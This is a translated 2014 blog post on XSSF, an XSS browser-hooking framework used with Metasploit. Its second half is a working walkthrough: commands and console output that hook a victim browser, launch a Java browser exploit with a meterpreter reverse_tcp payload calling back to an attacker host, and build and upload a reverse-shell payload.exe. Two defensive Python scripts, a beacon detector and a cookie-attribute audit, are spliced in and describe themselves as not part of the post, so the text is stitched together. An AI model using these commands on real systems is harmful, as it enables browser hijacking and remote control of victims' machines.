
XSSF - Cross Site Scripting Framework

Cnlouds
Published on 2014/06/19 23:12

The Cross Site Scripting Framework (XSSF) is a security tool set designed to quickly discover XSS vulnerabilities in websites. The project's purpose is to demonstrate that a site's XSS vulnerabilities exist and how they can be exploited.

XSSF creates a communication channel with the target browser (one affected by an XSS vulnerability) in order to carry out attacks. Users are free to choose from the existing attack modules to use against the target browser.

(My English is too poor and I can't be bothered to translate; once it is converted into English everyone should be able to follow.)
The XSSF framework lets you manage the victims of XSS attacks and keeps a persistent connection with them through a JavaScript "loop", which is responsible for sending reverse requests at defined intervals of time in order to execute exploits against the victim.
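The polling loop described above is what a defender can look for: on the victim's network it shows up in proxy or web server logs as one client requesting the same URL again and again with very regular spacing. The following Python script is an added example, not code from the original post or from XSSF; it flags such fixed-interval series in a log. The log lines are constructed for the example and their layout (ISO timestamp, client IP, method, URL) is an assumption, not a real log format.

```python
"""Flag fixed-interval polling ("beaconing") in web proxy logs.

Added example, not code from the original post or from XSSF. The XSSF
JavaScript loop polls its server at a defined interval; on the defender's
side that shows up in proxy or web server logs as one client requesting
the same URL over and over with very regular spacing. The log lines below
are constructed for this example and their layout (ISO timestamp, client
IP, method, URL) is an assumption, not a real log format.
"""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed sample: 192.168.0.12 polls one URL every 5 s (beacon-like),
# 192.168.0.20 requests one URL 5 times at irregular gaps (normal browsing).
SAMPLE_LOG = """\
2014-06-19T23:12:00 192.168.0.12 GET http://203.0.113.5/loop
2014-06-19T23:12:01 192.168.0.20 GET http://example.com/index.php
2014-06-19T23:12:05 192.168.0.12 GET http://203.0.113.5/loop
2014-06-19T23:12:10 192.168.0.12 GET http://203.0.113.5/loop
2014-06-19T23:12:14 192.168.0.20 GET http://example.com/index.php
2014-06-19T23:12:15 192.168.0.12 GET http://203.0.113.5/loop
2014-06-19T23:12:20 192.168.0.12 GET http://203.0.113.5/loop
2014-06-19T23:12:25 192.168.0.12 GET http://203.0.113.5/loop
2014-06-19T23:12:59 192.168.0.20 GET http://example.com/index.php
2014-06-19T23:14:03 192.168.0.20 GET http://example.com/index.php
2014-06-19T23:14:10 192.168.0.20 GET http://example.com/index.php
"""


def parse_line(line):
    """Split one constructed log line into (timestamp, client, method, url)."""
    ts, client, method, url = line.split()
    return datetime.fromisoformat(ts), client, method, url


def find_beacons(log_text, min_hits=5, max_jitter=0.1):
    """Return (client, url) pairs requested at least min_hits times whose
    inter-request gaps vary by no more than max_jitter (stdev / mean)."""
    series = defaultdict(list)
    for line in log_text.splitlines():
        if line.strip():
            ts, client, _method, url = parse_line(line)
            series[(client, url)].append(ts)

    findings = []
    for (client, url), times in series.items():
        if len(times) < min_hits:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        if avg <= 0:  # identical timestamps, not a timed loop
            continue
        jitter = pstdev(gaps) / avg
        if jitter <= max_jitter:
            findings.append({
                "client": client, "url": url, "hits": len(times),
                "interval_s": round(avg, 2), "jitter": round(jitter, 3),
            })
    return findings


if __name__ == "__main__":
    for f in find_beacons(SAMPLE_LOG):
        print(f"{f['client']} -> {f['url']}: {f['hits']} hits every "
              f"{f['interval_s']}s (jitter {f['jitter']})")
```

The jitter threshold is the important knob: a human browsing the same page five times spreads the requests unevenly, while a timed script keeps the gaps nearly identical. Run over real logs, tune `min_hits` and `max_jitter` against the site's own traffic first, since auto-refreshing dashboards produce the same pattern legitimately.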

        

To use XSSF in Metasploit you need to locate an application that is vulnerable to XSS attacks. To test and improve skills in the field of web application security there is a project called DVWA (Damn Vulnerable Web Application): an application written in PHP/MySQL that ships with a number of vulnerabilities enabled, allowing a security professional to interact with the application and understand the attacks that can be carried out against web applications.


XSSF provides a documented, powerful API which facilitates the development of modules and attacks. In addition, its integration into the Metasploit Framework lets users easily launch MSF browser-based exploits through an XSS vulnerability.

Exploiting an XSS bug in the victim's browser could let the attacker browse the website from the attacker's own browser using the victim's connected session. In most cases, simply stealing the victim's cookie will be sufficient to do this.

However, in a few cases (intranets, network tool portals, etc.) the cookie will not be useful to an external attacker. That is why XSSF Tunnel was created: to let the attacker browse the affected domain using the victim's session.

With XSS we can create a tunnel that lets us connect to our victim from a web browser. The basic idea was to create a tunnel that serves as a proxy for the communication between the attacker and the application with the exploited XSS vulnerability, passed through the victim; in this way additional attacks can be run without revealing the attacker's identity, using the victim's identity instead.
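The two passages above describe the two ways a session gets abused: stealing the cookie outright, and tunnelling through the victim's browser when the cookie alone is not useful. The cookie attributes a site sets decide how much the first path is worth. The following Python audit is an added example, not code from the original post, XSSF or DVWA; it parses Set-Cookie header values and reports missing HttpOnly, Secure and SameSite. The header values are constructed samples, and the cookie name PHPSESSID is just the usual PHP session cookie name, not a DVWA setting.

```python
"""Audit Set-Cookie headers for the attributes that limit what a stolen
session cookie is worth.

Added example, not code from the original post, XSSF or DVWA. HttpOnly
keeps the cookie out of document.cookie, so an injected script cannot read
it; Secure and SameSite limit where the browser sends it. The header
values below are constructed samples; PHPSESSID is simply the default PHP
session cookie name, not a DVWA setting.
"""


def parse_set_cookie(header_value):
    """Split a Set-Cookie value into (name, value, {attribute: value|True})."""
    parts = [p.strip() for p in header_value.split(";") if p.strip()]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        # Flag attributes (Secure, HttpOnly) have no value; store True for them.
        attrs[key.strip().lower()] = val.strip() if val else True
    return name.strip(), value.strip(), attrs


def audit_set_cookie(header_value):
    """Return (cookie_name, [issue, ...]); an empty list means the cookie
    carries HttpOnly, Secure and a Lax/Strict SameSite."""
    name, _, attrs = parse_set_cookie(header_value)
    issues = []
    if "httponly" not in attrs:
        issues.append("missing HttpOnly: script can read it via document.cookie")
    if "secure" not in attrs:
        issues.append("missing Secure: sent over plain HTTP too")
    samesite = attrs.get("samesite")
    if not isinstance(samesite, str) or samesite.lower() not in ("lax", "strict"):
        issues.append("SameSite not Lax/Strict: attached to cross-site requests")
    return name, issues


# Constructed samples: the weak form and the hardened form of the same cookie.
WEAK_COOKIE = "PHPSESSID=abc123; Path=/"
HARDENED_COOKIE = "PHPSESSID=abc123; Path=/; Secure; HttpOnly; SameSite=Lax"

if __name__ == "__main__":
    for header in (WEAK_COOKIE, HARDENED_COOKIE):
        name, issues = audit_set_cookie(header)
        print(f"{name}: {'OK' if not issues else '; '.join(issues)}")
```

HttpOnly closes the "steal the cookie" path, but not the tunnel path the article goes on to describe, where the victim's own browser sends the requests and the cookie rides along automatically. Blocking that requires stopping the injection itself (output encoding and a Content Security Policy that forbids inline script), so the cookie audit is a floor, not a complete fix.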

The new MSF version 4.6.0-dev is supported on:

    • Backtrack 5R3

    • Ubuntu 12.04

    • Kali 1.0 

    • Windows 7 

XSS (Cross Site Scripting) vulnerabilities

    • Indirect Cross Site Scripting (Reflected): reflective XSS

    • Direct Cross Site Scripting (Persistent)

Manual with examples: "XSS for fun and profit"

It allows:

    • Stealing cookies

    • Executing commands (via JavaScript)

    • Executing denial of service (DDoS) attacks

XSSF with Metasploit

    msfupdate
    cd /opt/metasploit/apps/pro/msf3
    svn export http://xssf.googlecode.com/svn/trunk ./ --force
    msfconsole
    msf > load xssf Port=80
    msf > help xssf

The available commands:

    • xssf_active_victims Shows active victims.

    • xssf_add_auto_attack Adds a new automated attack (launched automatically when a victim connects).

    • xssf_auto_attacks Shows the XSSF automated attacks.

    • xssf_banner Prints the XSS Framework banner!

    • xssf_clean_victims Cleans the victims in the database (removes waiting attacks).

    • xssf_exploit Launches and injects a module (running in one of its processes) into a given victim.

    • xssf_information Shows information about a given victim.

    • xssf_log Shows the log with a given ID.

    • xssf_logs Shows the logs for a given victim.

    • xssf_remove_auto_attack Removes an automated attack.

    • xssf_remove_victims Removes the victims from the database.

    • xssf_restore_state Restores the XSSF state (victims, logs, etc.) from the input file.

    • xssf_save_state Saves the XSSF state (victims, logs, etc.) to the output file.

    • xssf_servers Shows all the attack servers used.

    • xssf_tunnel Provides a tunnel between attacker and victim.

    • xssf_urls Lists the useful URLs provided by XSSF.

    • xssf_victims Shows all victims.

Example of a victim using Internet Explorer 7 and a vulnerable version of Java on Windows XP.

    xssf_victims

        1 1 192.168.0.12 true 5 Internet Explorer 7.0 YES

    xssf_information 1

            [..] 
            BROWSER NAME : Internet Explorer
            BROWSER VERSION : 7.0
            OS NAME : Windows
            OS VERSION : XP
            ARCHITECTURE : ARCH_X86 
            [..]
            

    use exploit/multi/browser/java_atomicreferencearray    
    set PAYLOAD java/meterpreter/reverse_tcp
    set SRVHOST 192.168.23.200
    set URIPATH xssf
    set LHOST 192.168.23.200
    exploit -j
    jobs

        Jobs
        ====
        Id Name
        -- ----
        0 Exploit: multi/browser/java_atomicreferencearray
        

    xssf_exploit 1 0

        [*] Searching Metasploit launched module with JobID = '0'...
        [+] A running exploit exists: 'Exploit: multi/browser/java_atomicreferencearray'
        [*] Exploit execution started, press [CTRL + C] to stop it !
        [+] Remaining victims to attack: [[1] (1)]
        [+] Code 'Exploit: multi/browser/java_atomicreferencearray' sent to victim '1'
        [+] Remaining victims to attack: NONE

        

    show sessions

        Active sessions
        ===============
        Id Type Information Connection
        -- ---- ----------- ----------
        1 meterpreter java/java victime @ Victim-PC 192.168.23.200:4444 -> 192.168.23.12:3128 (192.168.23.12)

    ruby msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.23.200 LPORT=5555 X > payload.exe
    use exploit/multi/handler
    exploit -j
    upload /opt/metasploit/apps/pro/msf3/payload.exe c
    background
    sessions -i 1

PS: Writing articles is hard, and translating is painful too; even though this is translated into English, I sincerely admire those translation masters!

via: Elhacker



© Copyright belongs to the author
